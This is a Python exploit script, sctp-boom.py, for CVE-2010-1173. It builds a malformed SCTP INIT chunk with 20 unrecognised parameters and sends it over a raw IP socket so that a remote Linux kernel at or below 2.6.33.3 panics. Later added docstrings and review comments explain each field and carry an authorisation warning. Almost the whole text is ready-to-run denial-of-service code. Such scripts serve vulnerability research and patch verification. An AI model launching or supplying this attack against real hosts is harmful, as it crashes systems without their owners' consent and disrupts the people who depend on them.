Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS



                                                # From: http://jon.oberheide.org/files/sctp-boom.py
#!/usr/bin/env python

'''
  sctp-boom.py
 
  Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
  Jon Oberheide <[email protected]>
  http://jon.oberheide.org
  
  Information:
 
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173

    The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
    Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote 
    attackers to cause a denial of service (system crash) via an SCTPChunkInit
    packet containing multiple invalid parameters that require a large amount 
    of error data. 

  Usage:
 
    $ python sctp-boom.py 1.2.3.4 19000
    [+] sending malformed SCTP INIT msg to 1.2.3.4:19000
    ...
    [+] kernel should have panicked on remote host 1.2.3.4

  Requirements:
    
    * dnet: http://libdnet.sourceforge.net/
    * dpkt: http://code.google.com/p/dpkt/
    * root privileges (the packet is sent over a raw IP socket)

'''

import os, sys, socket

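def err(txt):
    """Print an error line and terminate the script with exit status 1.

    Args:
        txt: message shown after the ``[-] error:`` prefix.

    Raises:
        SystemExit: always, with code 1.
    """
    # Parenthesised single-argument print behaves the same on Python 2 and 3,
    # unlike the original ``print '...'`` statement form.
    print('[-] error: %s' % txt)
    sys.exit(1)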

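def msg(txt):
    """Print a progress line prefixed with ``[+]``.

    Args:
        txt: message to show.
    """
    # Parenthesised form so the script parses under Python 3 as well as 2.
    print('[+] %s' % txt)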

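def usage():
    """Write the command-line usage to stderr and exit with status 1.

    Raises:
        SystemExit: always, with code 1.
    """
    # sys.stderr.write replaces the Python-2-only ``print >> sys.stderr`` form.
    sys.stderr.write('usage: %s host port\n' % sys.argv[0])
    sys.exit(1)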

# dpkt builds the IP/SCTP packet in main(); fail fast with a pointer to the
# library rather than with an AttributeError later on.
try:
    import dpkt
except ImportError:
    err('requires dpkt library: http://code.google.com/p/dpkt/')

# libdnet's Python binding provides the raw IP socket and the interface lookup
# used in main(); it is also distributed under the module name "dumbnet",
# which is tried as a fallback before giving up.
try:
    import dnet
except ImportError:
    try:
        import dumbnet as dnet
    except ImportError:
        err('requires dnet library: http://libdnet.sourceforge.net/')

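def main():
    """Send one malformed SCTP INIT chunk to ``host:port`` over a raw IP socket.

    The INIT carries the five mandatory fixed fields (RFC 4960 §3.3.2)
    followed by 20 copies of an unrecognised parameter of type 0xc0ff.  With
    the top two bits of the type set, the receiver is expected to report each
    parameter back in an ERROR chunk; on kernels affected by CVE-2010-1173
    (<= 2.6.33.3) accumulating that error data crashes the host.

    This is a destructive denial-of-service test: run it only against systems
    you are authorised to crash.  The script exits with status 1 (via usage()
    or err()) on bad arguments, an unresolvable host, or missing raw-socket
    privileges; it does not wait for or verify the result.

    Command line:
        host: hostname or dotted IPv4 address of the target.
        port: destination SCTP port, 1-65535.
    """
    if len(sys.argv) != 3:
        usage()

    host = sys.argv[1]
    try:
        port = int(sys.argv[2])
    except ValueError:
        err('port must be an integer, got %r' % sys.argv[2])
    # Reject values the 16-bit port field cannot hold before dpkt fails to pack them.
    if not 0 < port < 65536:
        err('port %d is out of range (1-65535)' % port)

    try:
        sock = dnet.ip()
        intf = dnet.intf()
    except OSError:
        err('requires root privileges for raw socket access')

    try:
        dst_addr = socket.gethostbyname(host)
    except socket.error as e:
        err('cannot resolve %s: %s' % (host, e))
    # Source the packet from the address of the interface that routes to the target.
    interface = intf.get_dst(dnet.addr(dst_addr))
    src_addr = interface['addr'].ip

    msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))

    # Fixed part of the INIT chunk.  b'' literals are plain str on Python 2
    # and bytes on Python 3, which is what dpkt expects in each case.
    invalid = b''.join([
        b'\x20\x10\x11\x73',  # initiate tag
        b'\x00\x00\xf4\x00',  # advertised receiver window credit (a_rwnd)
        b'\x00\x05',          # number of outbound streams
        b'\x00\x05',          # number of inbound streams
        b'\x20\x10\x11\x73',  # initial TSN
    ])
    # 20 unrecognised parameters: type 0xc0ff, length 8, value 0xffffffff.
    # Each one obliges the receiver to generate error data, which is what
    # drives the overflow described in the CVE.
    invalid += b'\xc0\xff\x00\x08\xff\xff\xff\xff' * 20

    init = dpkt.sctp.Chunk()
    init.type = dpkt.sctp.INIT
    init.data = invalid
    init.len = len(init)  # chunk header plus the parameters above

    sctp = dpkt.sctp.SCTP()
    sctp.sport = 0x1173  # arbitrary source port
    sctp.dport = port
    sctp.data = [init]

    ip = dpkt.ip.IP()
    ip.src = src_addr
    ip.dst = dnet.ip_aton(dst_addr)
    ip.p = dpkt.ip.IP_PROTO_SCTP
    ip.data = sctp
    ip.len = len(ip)

    # repr() replaces the Python-2-only backtick form.
    print(repr(ip))

    # bytes(ip) is str(ip) on Python 2 and dpkt's __bytes__ on Python 3.
    # NOTE(review): the SCTP checksum field is left at 0 here; dpkt is
    # expected to compute the CRC32c on serialisation and dnet.ip_checksum()
    # to fill in the IP header checksum -- confirm with the library versions
    # in use if the target does not react.
    pkt = dnet.ip_checksum(bytes(ip))
    sock.send(pkt)

    # NOTE(review): nothing here confirms the crash; presumably the target
    # also needs to be processing SCTP on that port for the INIT to be parsed.
    msg('kernel should have panicked on remote host %s' % (dst_addr))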

if __name__ == &#39;__main__&#39;:
    main()